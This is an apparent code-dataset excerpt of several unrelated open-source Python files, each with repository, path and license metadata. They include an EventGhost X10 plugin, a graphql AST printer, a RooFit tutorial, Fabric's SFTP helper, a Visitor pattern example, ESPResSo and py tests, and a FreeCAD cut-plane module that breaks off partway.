'C': 'DVDMenu',
'MTPlaylist': 'DVDAudio',
'MTEnter': 'Fullscreen',
}
],
[
"Generic X10",
{
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
}
],
[
"SnapStream FireFly",
{
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
'MTTV': 'Maximize',
'Power': 'Close',
'MTAddDelete': 'Back',
'MTAB': 'Enter',
'VolumeDown': 'VolumeUp',
'VolumeUp': 'VolumeDown',
'A': 'FireFly',
'MTRadio': 'Info',
'MTPC': 'Option',
'Bookmark': 'Menu',
'Resize': 'Exit',
'Input': 'PreviousTrack',
'Zoom': 'NextTrack',
'Book': 'Music',
'Web': 'Photo',
'Hand': 'Video',
'B': 'Help',
'MTVCR': 'Mouse',
'C': 'A',
'D': 'B',
'E': 'C',
'F': 'D',
}
],
]
REMOTES_SORT_ORDER = [2, 0, 1, 3]
REMOTE_IDS = {
192: 1,
208: 2,
224: 3,
240: 4,
32: 5,
48: 6,
0: 7,
16: 8,
64: 9,
80: 10,
96: 11,
112: 12,
160: 13,
176: 14,
128: 15,
144: 16,
}
class X10Events:
plugin = None
#@eg.LogIt
def OnX10Command(
self,
bszCommand,
eCommand,
lAddress,
eKeyState,
lSequence,
eCommandType,
varTimestamp
):
if eKeyState == 3:
return
plugin = self.plugin
remoteId = REMOTE_IDS[lAddress & 0xF0]
if remoteId not in plugin.ids:
return
event = str(bszCommand)
if eKeyState == 1:
plugin.TriggerEnduringEvent(plugin.mappingTable.get(event, event))
elif eKeyState == 2:
plugin.EndLastEvent()
class X10ThreadWorker(eg.ThreadWorker):
comInstance = None
plugin = None
eventHandler = None
def Setup(self, plugin, eventHandler):
self.plugin = plugin
self.eventHandler = eventHandler
self.comInstance = DispatchWithEvents(
'X10net.X10Control.1',
eventHandler
)
def Finish(self):
if self.comInstance:
self.comInstance.Close()
del self.comInstance
class X10(eg.PluginBase):
text = Text
def __init__(self):
self.AddEvents()
def __start__(self, remoteType=None, ids=None, prefix=None):
self.remoteType = remoteType
self.ids = ids
self.info.eventPrefix = prefix
self.mappingTable = REMOTES[remoteType][1]
class SubX10Events(X10Events):
plugin = self
self.workerThread = X10ThreadWorker(self, SubX10Events)
try:
self.workerThread.Start(20)
except:
raise self.Exception(self.text.errorMesg)
def __stop__(self):
self.workerThread.Stop(10)
def GetLabel(self, remoteType, *dummyArgs):
return "X10: " + REMOTES[remoteType][0]
def Configure(self, remoteType=2, ids=None, prefix="X10"):
panel = eg.ConfigPanel()
text = self.text
fbtypes = []
selection = 0
for i, remoteId in enumerate(REMOTES_SORT_ORDER):
fbtypes.append(REMOTES[remoteId][0])
if remoteId == remoteType:
selection = i
remoteTypeCtrl = panel.Choice(selection, fbtypes)
prefixCtrl = panel.TextCtrl(prefix)
btnsizer = wx.FlexGridSizer(4, 4)
idBtns = []
for i in xrange(16):
btn = wx.ToggleButton(panel, -1, size=(35, 35), label=str(i + 1))
if (ids is None) or ((i+1) in ids):
btn.SetValue(True)
btnsizer.Add(btn)
idBtns.append(btn)
selectAllButton = panel.Button(text.allButton, style=wx.BU_EXACTFIT)
def OnSelectAll(event):
for item in idBtns:
item.SetValue(True)
event.Skip()
selectAllButton.Bind(wx.EVT_BUTTON, OnSelectAll)
selectNoneButton = panel.Button(text.noneButton, style=wx.BU_EXACTFIT)
def OnSelectNone(event):
for item in idBtns:
item.SetValue(False)
event.Skip()
selectNoneButton.Bind(wx.EVT_BUTTON, OnSelectNone)
rightBtnSizer = eg.VBoxSizer(
(selectAllButton, 0, wx.EXPAND),
((5, 5), 1),
(selectNoneButton, 0, wx.EXPAND),
)
idSizer = eg.HBoxSizer(
(btnsizer),
((10, 10), 0),
(rightBtnSizer, 0, wx.EXPAND),
)
leftSizer = eg.VBoxSizer(
(panel.StaticText(text.remoteBox), 0, wx.BOTTOM, 2),
(remoteTypeCtrl, 0, wx.BOTTOM, 10),
(panel.StaticText(text.usePrefix), 0, wx.BOTTOM, 2),
(prefixCtrl),
)
rightSizer = eg.VBoxSizer(
(panel.StaticText(text.idBox), 0, wx.BOTTOM, 2),
(idSizer),
)
mainSizer = eg.HBoxSizer(
(leftSizer),
((0, 0), 1, wx.EXPAND),
(wx.StaticLine(panel, style=wx.LI_VERTICAL), 0, wx.EXPAND),
((0, 0), 1, wx.EXPAND),
(rightSizer),
((0, 0), 1, wx.EXPAND),
)
panel.sizer.Add(mainSizer, 1, wx.EXPAND)
while panel.Affirmed():
panel.SetResult(
REMOTES_SORT_ORDER[remoteTypeCtrl.GetValue()],
[i+1 for i, button in enumerate(idBtns) if button.GetValue()],
prefixCtrl.GetValue()
)
|
topic2k/EventGhost
|
plugins/X10/__init__.py
|
Python
|
gpl-2.0
| 10,254
|
[
"Firefly"
] |
658108862915845a9c1e29978d93ba76b4082c27962bb67c77eded016506c1df
|
import json
from .visitor import Visitor, visit
__all__ = ['print_ast']
def print_ast(ast):
return visit(ast, PrintingVisitor())
class PrintingVisitor(Visitor):
__slots__ = ()
def leave_Name(self, node, *args):
return node.value
def leave_Variable(self, node, *args):
return '$' + node.name
def leave_Document(self, node, *args):
return join(node.definitions, '\n\n') + '\n'
def leave_OperationDefinition(self, node, *args):
name = node.name
selection_set = node.selection_set
op = node.operation
var_defs = wrap('(', join(node.variable_definitions, ', '), ')')
directives = join(node.directives, ' ')
if not name and not directives and not var_defs and op == 'query':
return selection_set
return join([op, join([name, var_defs]), directives, selection_set], ' ')
def leave_VariableDefinition(self, node, *args):
return node.variable + ': ' + node.type + wrap(' = ', node.default_value)
def leave_SelectionSet(self, node, *args):
return block(node.selections)
def leave_Field(self, node, *args):
return join([
wrap('', node.alias, ': ') + node.name + wrap('(', join(node.arguments, ', '), ')'),
join(node.directives, ' '),
node.selection_set
], ' ')
def leave_Argument(self, node, *args):
return node.name + ': ' + node.value
# Fragments
def leave_FragmentSpread(self, node, *args):
return '...' + node.name + wrap(' ', join(node.directives, ' '))
def leave_InlineFragment(self, node, *args):
return join([
'...',
wrap('on ', node.type_condition),
join(node.directives, ''),
node.selection_set
], ' ')
def leave_FragmentDefinition(self, node, *args):
return ('fragment {} on {} '.format(node.name, node.type_condition) +
wrap('', join(node.directives, ' '), ' ') +
node.selection_set)
# Value
def leave_IntValue(self, node, *args):
return node.value
def leave_FloatValue(self, node, *args):
return node.value
def leave_StringValue(self, node, *args):
return json.dumps(node.value)
def leave_BooleanValue(self, node, *args):
return json.dumps(node.value)
def leave_EnumValue(self, node, *args):
return node.value
def leave_ListValue(self, node, *args):
return '[' + join(node.values, ', ') + ']'
def leave_ObjectValue(self, node, *args):
return '{' + join(node.fields, ', ') + '}'
def leave_ObjectField(self, node, *args):
return node.name + ': ' + node.value
# Directive
def leave_Directive(self, node, *args):
return '@' + node.name + wrap('(', join(node.arguments, ', '), ')')
# Type
def leave_NamedType(self, node, *args):
return node.name
def leave_ListType(self, node, *args):
return '[' + node.type + ']'
def leave_NonNullType(self, node, *args):
return node.type + '!'
# Type Definitions:
def leave_SchemaDefinition(self, node, *args):
return join([
'schema',
join(node.directives, ' '),
block(node.operation_types),
], ' ')
def leave_OperationTypeDefinition(self, node, *args):
return '{}: {}'.format(node.operation, node.type)
def leave_ScalarTypeDefinition(self, node, *args):
return 'scalar ' + node.name + wrap(' ', join(node.directives, ' '))
def leave_ObjectTypeDefinition(self, node, *args):
return join([
'type',
node.name,
wrap('implements ', join(node.interfaces, ', ')),
join(node.directives, ' '),
block(node.fields)
], ' ')
def leave_FieldDefinition(self, node, *args):
return (
node.name +
wrap('(', join(node.arguments, ', '), ')') +
': ' +
node.type +
wrap(' ', join(node.directives, ' '))
)
def leave_InputValueDefinition(self, node, *args):
return node.name + ': ' + node.type + wrap(' = ', node.default_value) + wrap(' ', join(node.directives, ' '))
def leave_InterfaceTypeDefinition(self, node, *args):
return 'interface ' + node.name + wrap(' ', join(node.directives, ' ')) + ' ' + block(node.fields)
def leave_UnionTypeDefinition(self, node, *args):
return 'union ' + node.name + wrap(' ', join(node.directives, ' ')) + ' = ' + join(node.types, ' | ')
def leave_EnumTypeDefinition(self, node, *args):
return 'enum ' + node.name + wrap(' ', join(node.directives, ' ')) + ' ' + block(node.values)
def leave_EnumValueDefinition(self, node, *args):
return node.name + wrap(' ', join(node.directives, ' '))
def leave_InputObjectTypeDefinition(self, node, *args):
return 'input ' + node.name + wrap(' ', join(node.directives, ' ')) + ' ' + block(node.fields)
def leave_TypeExtensionDefinition(self, node, *args):
return 'extend ' + node.definition
def leave_DirectiveDefinition(self, node, *args):
return 'directive @{}{} on {}'.format(node.name, wrap(
'(', join(node.arguments, ', '), ')'), ' | '.join(node.locations))
def join(maybe_list, separator=''):
if maybe_list:
return separator.join(filter(None, maybe_list))
return ''
def block(_list):
'''Given a list, print each item on its own line, wrapped in an indented "{ }" block.'''
if _list:
return indent('{\n' + join(_list, '\n')) + '\n}'
return '{}'
def wrap(start, maybe_str, end=''):
if maybe_str:
return start + maybe_str + end
return ''
def indent(maybe_str):
if maybe_str:
return maybe_str.replace('\n', '\n ')
return maybe_str
|
wandb/client
|
wandb/vendor/graphql-core-1.1/wandb_graphql/language/printer.py
|
Python
|
mit
| 5,888
|
[
"VisIt"
] |
807f88fa089e597c3d15c088212697a312bfbff9b39a1cc03aac2246255b4d0f
|
## \file
## \ingroup tutorial_roofit
## \notebook
## Basic functionality: interpreted functions and pdfs
##
## \macro_code
##
## \date February 2018
## \authors Clemens Lange, Wouter Verkerke (C++ version)
import ROOT
# Generic interpreted pdf
# ------------------------------
# Declare observable x
x = ROOT.RooRealVar("x", "x", -20, 20)
# Construct generic pdf from interpreted expression
# ------------------------------------------------------
# ROOT.To construct a proper pdf, the formula expression is explicitly normalized internally by dividing
# it by a numeric integral of the expresssion over x in the range [-20,20]
#
alpha = ROOT.RooRealVar("alpha", "alpha", 5, 0.1, 10)
genpdf = ROOT.RooGenericPdf(
"genpdf",
"genpdf",
"(1+0.1*abs(x)+sin(sqrt(abs(x*alpha+0.1))))",
ROOT.RooArgList(
x,
alpha))
# Sample, fit and plot generic pdf
# ---------------------------------------------------------------
# Generate a toy dataset from the interpreted pdf
data = genpdf.generate(ROOT.RooArgSet(x), 10000)
# Fit the interpreted pdf to the generated data
genpdf.fitTo(data)
# Make a plot of the data and the pdf overlaid
xframe = x.frame(ROOT.RooFit.Title("Interpreted expression pdf"))
data.plotOn(xframe)
genpdf.plotOn(xframe)
# Standard pdf adjust with interpreted helper function
# ------------------------------------------------------------------------------------------------------------
# Make a gauss(x,sqrt(mean2),sigma) from a standard ROOT.RooGaussian #
#
# Construct standard pdf with formula replacing parameter
# ------------------------------------------------------------------------------------------------------------
# Construct parameter mean2 and sigma
mean2 = ROOT.RooRealVar("mean2", "mean^2", 10, 0, 200)
sigma = ROOT.RooRealVar("sigma", "sigma", 3, 0.1, 10)
# Construct interpreted function mean = sqrt(mean^2)
mean = ROOT.RooFormulaVar(
"mean", "mean", "sqrt(mean2)", ROOT.RooArgList(mean2))
# Construct a gaussian g2(x,sqrt(mean2),sigma)
g2 = ROOT.RooGaussian("g2", "h2", x, mean, sigma)
# Generate toy data
# ---------------------------------
# Construct a separate gaussian g1(x,10,3) to generate a toy Gaussian
# dataset with mean 10 and width 3
g1 = ROOT.RooGaussian("g1", "g1", x, ROOT.RooFit.RooConst(
10), ROOT.RooFit.RooConst(3))
data2 = g1.generate(ROOT.RooArgSet(x), 1000)
# Fit and plot tailored standard pdf
# -------------------------------------------------------------------
# Fit g2 to data from g1
r = g2.fitTo(data2, ROOT.RooFit.Save()) # ROOT.RooFitResult
r.Print()
# Plot data on frame and overlay projection of g2
xframe2 = x.frame(ROOT.RooFit.Title("Tailored Gaussian pdf"))
data2.plotOn(xframe2)
g2.plotOn(xframe2)
# Draw all frames on a canvas
c = ROOT.TCanvas("rf103_interprfuncs", "rf103_interprfuncs", 800, 400)
c.Divide(2)
c.cd(1)
ROOT.gPad.SetLeftMargin(0.15)
xframe.GetYaxis().SetTitleOffset(1.4)
xframe.Draw()
c.cd(2)
ROOT.gPad.SetLeftMargin(0.15)
xframe2.GetYaxis().SetTitleOffset(1.4)
xframe2.Draw()
c.SaveAs("rf103_interprfuncs.png")
|
root-mirror/root
|
tutorials/roofit/rf103_interprfuncs.py
|
Python
|
lgpl-2.1
| 3,103
|
[
"Gaussian"
] |
9147aae81fcea97d40fa6998440f02f74fe200fdd431a31586a6fac8c4f73ed3
|
from __future__ import with_statement
import hashlib
import os
import stat
import tempfile
from fnmatch import filter as fnfilter
from fabric.state import output, connections, env
from fabric.utils import warn
class SFTP(object):
"""
SFTP helper class, which is also a facade for paramiko.SFTPClient.
"""
def __init__(self, host_string):
self.ftp = connections[host_string].open_sftp()
# Recall that __getattr__ is the "fallback" attribute getter, and is thus
# pretty safe to use for facade-like behavior as we're doing here.
def __getattr__(self, attr):
return getattr(self.ftp, attr)
def isdir(self, path):
try:
return stat.S_ISDIR(self.ftp.lstat(path).st_mode)
except IOError:
return False
def islink(self, path):
try:
return stat.S_ISLNK(self.ftp.lstat(path).st_mode)
except IOError:
return False
def exists(self, path):
try:
self.ftp.lstat(path).st_mode
except IOError:
return False
return True
def glob(self, path):
from fabric.state import win32
dirpart, pattern = os.path.split(path)
rlist = self.ftp.listdir(dirpart)
names = fnfilter([f for f in rlist if not f[0] == '.'], pattern)
ret = [path]
if len(names):
s = '/'
ret = [dirpart.rstrip(s) + s + name.lstrip(s) for name in names]
if not win32:
ret = [os.path.join(dirpart, name) for name in names]
return ret
def walk(self, top, topdown=True, onerror=None, followlinks=False):
from os.path import join, isdir, islink
# We may not have read permission for top, in which case we can't get a
# list of the files the directory contains. os.path.walk always
# suppressed the exception then, rather than blow up for a minor reason
# when (say) a thousand readable directories are still left to visit.
# That logic is copied here.
try:
# Note that listdir and error are globals in this module due to
# earlier import-*.
names = self.ftp.listdir(top)
except Exception, err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if self.isdir(join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
path = join(top, name)
if followlinks or not self.islink(path):
for x in self.walk(path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def mkdir(self, path, use_sudo):
from fabric.api import sudo, hide
if use_sudo:
with hide('everything'):
sudo('mkdir %s' % path)
else:
self.ftp.mkdir(path)
def get(self, remote_path, local_path, local_is_path, rremote=None):
# rremote => relative remote path, so get(/var/log) would result in
# this function being called with
# remote_path=/var/log/apache2/access.log and
# rremote=apache2/access.log
rremote = rremote if rremote is not None else remote_path
# Handle format string interpolation (e.g. %(dirname)s)
path_vars = {
'host': env.host_string.replace(':', '-'),
'basename': os.path.basename(rremote),
'dirname': os.path.dirname(rremote),
'path': rremote
}
if local_is_path:
# Interpolate, then abspath (to make sure any /// are compressed)
local_path = os.path.abspath(local_path % path_vars)
# Ensure we give Paramiko a file by prepending and/or creating
# local directories as appropriate.
dirpath, filepath = os.path.split(local_path)
if dirpath and not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.isdir(local_path):
local_path = os.path.join(local_path, path_vars['basename'])
if output.running:
print("[%s] download: %s <- %s" % (
env.host_string,
local_path if local_is_path else "<file obj>",
remote_path
))
# Warn about overwrites, but keep going
if local_is_path and os.path.exists(local_path):
msg = "Local file %s already exists and is being overwritten."
warn(msg % local_path)
# Have to bounce off FS if doing file-like objects
fd, real_local_path = None, local_path
if not local_is_path:
fd, real_local_path = tempfile.mkstemp()
self.ftp.get(remote_path, real_local_path)
# Return file contents (if it needs stuffing into a file-like obj)
# or the final local file path (otherwise)
result = None
if not local_is_path:
file_obj = os.fdopen(fd)
result = file_obj.read()
# Clean up temporary file
file_obj.close()
os.remove(real_local_path)
else:
result = real_local_path
return result
def get_dir(self, remote_path, local_path):
# Decide what needs to be stripped from remote paths so they're all
# relative to the given remote_path
if os.path.basename(remote_path):
strip = os.path.dirname(remote_path)
else:
strip = os.path.dirname(os.path.dirname(remote_path))
# Store all paths gotten so we can return them when done
result = []
# Use our facsimile of os.walk to find all files within remote_path
for context, dirs, files in self.walk(remote_path):
# Normalize current directory to be relative
# E.g. remote_path of /var/log and current dir of /var/log/apache2
# would be turned into just 'apache2'
lcontext = rcontext = context.replace(strip, '', 1).lstrip('/')
# Prepend local path to that to arrive at the local mirrored
# version of this directory. So if local_path was 'mylogs', we'd
# end up with 'mylogs/apache2'
lcontext = os.path.join(local_path, lcontext)
# Download any files in current directory
for f in files:
# Construct full and relative remote paths to this file
rpath = os.path.join(context, f)
rremote = os.path.join(rcontext, f)
# If local_path isn't using a format string that expands to
# include its remote path, we need to add it here.
if "%(path)s" not in local_path \
and "%(dirname)s" not in local_path:
lpath = os.path.join(lcontext, f)
# Otherwise, just passthrough local_path to self.get()
else:
lpath = local_path
# Now we can make a call to self.get() with specific file paths
# on both ends.
result.append(self.get(rpath, lpath, True, rremote))
return result
def put(self, local_path, remote_path, use_sudo, mirror_local_mode, mode,
local_is_path):
from fabric.api import sudo, hide
pre = self.ftp.getcwd()
pre = pre if pre else ''
if local_is_path and self.isdir(remote_path):
basename = os.path.basename(local_path)
remote_path = os.path.join(remote_path, basename)
if output.running:
print("[%s] put: %s -> %s" % (
env.host_string,
local_path if local_is_path else '<file obj>',
os.path.join(pre, remote_path)
))
# When using sudo, "bounce" the file through a guaranteed-unique file
# path in the default remote CWD (which, typically, the login user will
# have write permissions on) in order to sudo(mv) it later.
if use_sudo:
target_path = remote_path
hasher = hashlib.sha1()
hasher.update(env.host_string)
hasher.update(target_path)
remote_path = hasher.hexdigest()
# Have to bounce off FS if doing file-like objects
fd, real_local_path = None, local_path
if not local_is_path:
fd, real_local_path = tempfile.mkstemp()
old_pointer = local_path.tell()
local_path.seek(0)
file_obj = os.fdopen(fd, 'wb')
file_obj.write(local_path.read())
file_obj.close()
local_path.seek(old_pointer)
rattrs = self.ftp.put(real_local_path, remote_path)
# Clean up
if not local_is_path:
os.remove(real_local_path)
# Handle modes if necessary
if (local_is_path and mirror_local_mode) or (mode is not None):
lmode = os.stat(local_path).st_mode if mirror_local_mode else mode
lmode = lmode & 07777
rmode = rattrs.st_mode & 07777
if lmode != rmode:
if use_sudo:
with hide('everything'):
sudo('chmod %o \"%s\"' % (lmode, remote_path))
else:
self.ftp.chmod(remote_path, lmode)
if use_sudo:
with hide('everything'):
sudo("mv \"%s\" \"%s\"" % (remote_path, target_path))
# Revert to original remote_path for return value's sake
remote_path = target_path
return remote_path
def put_dir(self, local_path, remote_path, use_sudo, mirror_local_mode,
mode):
if os.path.basename(local_path):
strip = os.path.dirname(local_path)
else:
strip = os.path.dirname(os.path.dirname(local_path))
remote_paths = []
for context, dirs, files in os.walk(local_path):
rcontext = context.replace(strip, '', 1)
rcontext = rcontext.lstrip('/')
rcontext = os.path.join(remote_path, rcontext)
if not self.exists(rcontext):
self.mkdir(rcontext, use_sudo)
for d in dirs:
n = os.path.join(rcontext, d)
if not self.exists(n):
self.mkdir(n, use_sudo)
for f in files:
local_path = os.path.join(context, f)
n = os.path.join(rcontext, f)
p = self.put(local_path, n, use_sudo, mirror_local_mode, mode,
True)
remote_paths.append(p)
return remote_paths
|
malin1993ml/h-store
|
third_party/python/fabric/sftp.py
|
Python
|
gpl-3.0
| 10,790
|
[
"VisIt"
] |
d5cb590b53d6b5cc2e7e29c12e05ccc140d2df410a6e827332ede09c183b05c6
|
"""
Represent an operation to be performed on the elements of an object
structure. Visitor lets you define a new operation without changing the
classes of the elements on which it operates.
"""
import abc
class Element(metaclass=abc.ABCMeta):
"""
Define an Accept operation that takes a visitor as an argument.
"""
@abc.abstractmethod
def accept(self, visitor):
pass
class ConcreteElementA(Element):
"""
Implement an Accept operation that takes a visitor as an argument.
"""
def accept(self, visitor):
visitor.visit_concrete_element_a(self)
class ConcreteElementB(Element):
"""
Implement an Accept operation that takes a visitor as an argument.
"""
def accept(self, visitor):
visitor.visit_concrete_element_b(self)
class Visitor(metaclass=abc.ABCMeta):
"""
Declare a Visit operation for each class of ConcreteElement in the
object structure. The operation's name and signature identifies the
class that sends the Visit request to the visitor. That lets the
visitor determine the concrete class of the element being visited.
Then the visitor can access the element directly through its
particular interface.
"""
@abc.abstractmethod
def visit_concrete_element_a(self, concrete_element_a):
pass
@abc.abstractmethod
def visit_concrete_element_b(self, concrete_element_b):
pass
class ConcreteVisitor1(Visitor):
"""
Implement each operation declared by Visitor. Each operation
implements a fragment of the algorithm defined for the corresponding
class of object in the structure. ConcreteVisitor provides the
context for the algorithm and stores its local state. This state
often accumulates results during the traversal of the structure.
"""
def visit_concrete_element_a(self, concrete_element_a):
pass
def visit_concrete_element_b(self, concrete_element_b):
pass
class ConcreteVisitor2(Visitor):
"""
Implement each operation declared by Visitor. Each operation
implements a fragment of the algorithm defined for the corresponding
class of object in the structure. ConcreteVisitor provides the
context for the algorithm and stores its local state. This state
often accumulates results during the traversal of the structure.
"""
def visit_concrete_element_a(self, concrete_element_a):
pass
def visit_concrete_element_b(self, concrete_element_b):
pass
def main():
concrete_visitor_1 = ConcreteVisitor1()
concrete_element_a = ConcreteElementA()
concrete_element_a.accept(concrete_visitor_1)
if __name__ == "__main__":
main()
|
tcp813/mouTools
|
design_patterns/visitor.py
|
Python
|
mit
| 2,702
|
[
"VisIt"
] |
ac0d77b0baa165591e119af461ce23aadfb78b850e8167a4fb63ca163c2bd669
|
#
# Copyright (C) 2013,2014,2015,2016 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Tests particle property setters/getters
from __future__ import print_function
import unittest as ut
import espressomd
import numpy as np
class DomainDecomposition(ut.TestCase):
S = espressomd.System(box_l=[1.0, 1.0, 1.0])
def setUp(self):
self.S.part.clear()
self.S.cell_system.set_domain_decomposition(use_verlet_lists=False)
def test_resort(self):
n_part = 2351
# Add the particles on node 0, so that they have to be
# resorted
for i in range(n_part):
self.S.part.add(id=i, pos=[0, 0, 0], type=1)
# And now change their positions
for i in range(n_part):
self.S.part[i].pos = pos = np.random.random(3)
# Distribute the particles on the nodes
part_dist = self.S.cell_system.resort()
# Check that we did not lose particles
self.assertEqual(sum(part_dist), n_part)
# Check that we can still access all the particles
# This basically checks if part_node and local_particles
# is still in a valid state after the particle exchange
self.assertEqual(sum(self.S.part[:].type), n_part)
if __name__ == "__main__":
print("Features: ", espressomd.features())
ut.main()
|
KonradBreitsprecher/espresso
|
testsuite/domain_decomposition.py
|
Python
|
gpl-3.0
| 1,968
|
[
"ESPResSo"
] |
9a01ecb6ec21a20c921e162c262b7d891334461fdb3beb9757bb51f1336bf803
|
import py
import types
import sys
def checksubpackage(name):
obj = getattr(py, name)
if hasattr(obj, '__map__'): # isinstance(obj, Module):
keys = dir(obj)
assert len(keys) > 0
print (obj.__map__)
for name in list(obj.__map__):
assert hasattr(obj, name), (obj, name)
def test_dir():
for name in dir(py):
if not name.startswith('_'):
yield checksubpackage, name
def test_virtual_module_identity():
from py import path as path1
from py import path as path2
assert path1 is path2
from py.path import local as local1
from py.path import local as local2
assert local1 is local2
def test_importall():
base = py._pydir
nodirs = [
]
if sys.version_info >= (3,0):
nodirs.append(base.join('_code', '_assertionold.py'))
else:
nodirs.append(base.join('_code', '_assertionnew.py'))
def recurse(p):
return p.check(dotfile=0) and p.basename != "attic"
for p in base.visit('*.py', recurse):
if p.basename == '__init__.py':
continue
relpath = p.new(ext='').relto(base)
if base.sep in relpath: # not py/*.py itself
for x in nodirs:
if p == x or p.relto(x):
break
else:
relpath = relpath.replace(base.sep, '.')
modpath = 'py.%s' % relpath
try:
check_import(modpath)
except py.test.skip.Exception:
pass
def check_import(modpath):
py.builtin.print_("checking import", modpath)
assert __import__(modpath)
def test_all_resolves():
seen = py.builtin.set([py])
lastlength = None
while len(seen) != lastlength:
lastlength = len(seen)
for item in py.builtin.frozenset(seen):
for value in item.__dict__.values():
if isinstance(value, type(py.test)):
seen.add(value)
|
youtube/cobalt
|
third_party/web_platform_tests/tools/py/testing/root/test_py_imports.py
|
Python
|
bsd-3-clause
| 1,983
|
[
"VisIt"
] |
9cc83489ff2f333b26383df09210bf91b66b3415222fca34776d1537a2d07aac
|
#*****************************************************************************
#* Copyright (c) 2014 Jonathan Wiedemann <wood.galaxy@gmail.com> (cutplan) *
#* Copyright (c) 2019 Jerome Laverroux <jerome.laverroux@free.fr> (cutline)*
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#*****************************************************************************
import FreeCAD,ArchCommands
if FreeCAD.GuiUp:
import FreeCADGui
from PySide import QtCore, QtGui
from DraftTools import translate
else:
# \cond
def translate(ctxt,txt):
return txt
# \endcond
__title__="FreeCAD CutPlane"
__author__ = "Jonathan Wiedemann"
__url__ = "http://www.freecadweb.org"
## @package ArchCutPlane
# \ingroup ARCH
# \brief The Cut plane object and tools
#
# This module handles the Cut Plane object
def getPlanWithLine(line):
"""Function to make a plane along Normal plan"""
import Part
plan = FreeCAD.DraftWorkingPlane
w = plan.getNormal()
part = Part.Shape(line)
out = part.extrude(w)
return out
def cutComponentwithPlane(archObject, cutPlane, sideFace):
"""cut object from a plan define by a face, Behind = 0 , front = 1"""
cutVolume = ArchCommands.getCutVolume(cutPlane, archObject.Object.Shape)
if sideFace == 0:
cutVolume = cutVolume[2]
else:
cutVolume = cutVolume[1]
if cutVolume:
obj = FreeCAD.ActiveDocument.addObject("Part::Feature","CutVolume")
obj.Shape = cutVolume
obj.ViewObject.ShapeColor = (1.00,0.00,0.00)
obj.ViewObject.Transparency = 75
if "Additions" in archObject.Object.PropertiesList:
ArchCommands.removeComponents(obj,archObject.Object)
return None
else:
cutObj = FreeCAD.ActiveDocument.addObject("Part::Cut","CutPlane")
cutObj.Base = archObject.Object
cutObj.Tool = obj
return cutObj
class _CommandCutLine:
"the Arch CutPlane command definition"
def GetResources(self):
return {'Pixmap' : 'Arch_CutLine',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut with a line"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut an object with a line with normal workplane")}
def IsActive(self):
return len(FreeCADGui.Selection.getSelection()) > 1
def Activated(self):
sel = FreeCADGui.Selection.getSelectionEx()
if len(sel) != 2:
FreeCAD.Console.PrintError("You must select exactly two objects, the shape to be cut and a line\n")
return
if not sel[1].SubObjects:
FreeCAD.Console.PrintError("You must select a line from the second object (cut line), not the whole object\n")
return
panel=_CutPlaneTaskPanel(linecut=True)
FreeCADGui.Control.showDialog(panel)
class _CommandCutPlane:
"the Arch CutPlane command definition"
def GetResources(self):
return {'Pixmap' : 'Arch_CutPlane',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut with plane"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut an object with a plane")}
def IsActive(self):
return len(FreeCADGui.Selection.getSelection()) > 1
def Activated(self):
sel = FreeCADGui.Selection.getSelectionEx()
if len(sel) != 2:
FreeCAD.Console.PrintError("You must select exactly two objects, the shape to be cut and the cut plane\n")
return
if not sel[1].SubObjects:
FreeCAD.Console.PrintError("You must select a face from the second object (cut plane), not the whole object\n")
return
panel=_CutPlaneTaskPanel()
FreeCADGui.Control.showDialog(panel)
class _CutPlaneTaskPanel:
def __init__(self,linecut=False):
self.linecut=linecut
self.plan=None
if linecut:
self.plan = getPlanWithLine(FreeCADGui.Selection.getSelectionEx()[1].SubObjects[0])
else :
self.plan = FreeCADGui.Selection.getSelectionEx()[1].SubObjects[0]
self.form = QtGui.QWidget()
self.form.setObjectName("TaskPanel")
self.grid = QtGui.QGridLayout(self.form)
self.grid.setObjectName("grid")
self.title = QtGui.QLabel(self.form)
self.grid.addWidget(self.title, 1, 0)
self.infoText = QtGui.QLabel(self.form)
self.grid.addWidget(self.infoText, 2, 0)
self.combobox = QtGui.QComboBox()
self.combobox.setCurrentIndex(0)
self.grid.addWidget(self.combobox, 2, 1)
QtCore.QObject.connect(self.combobox,QtCore.SIGNAL("currentIndexChanged(int)"),self.previewCutVolume)
self.previewObj = FreeCAD.ActiveDocument.addObject("Part::Feature","PreviewCutVolume")
self.retranslateUi(self.form)
self.previewCutVolume(self.combobox.currentIndex())
def isAllowedAlterSelection(self):
return False
def accept(self):
FreeCAD.ActiveDocument.removeObject(self.previewObj.Name)
val = self.combobox.currentIndex()
s = FreeCADGui.Selection.getSelectionEx()
if len(s) > 1:
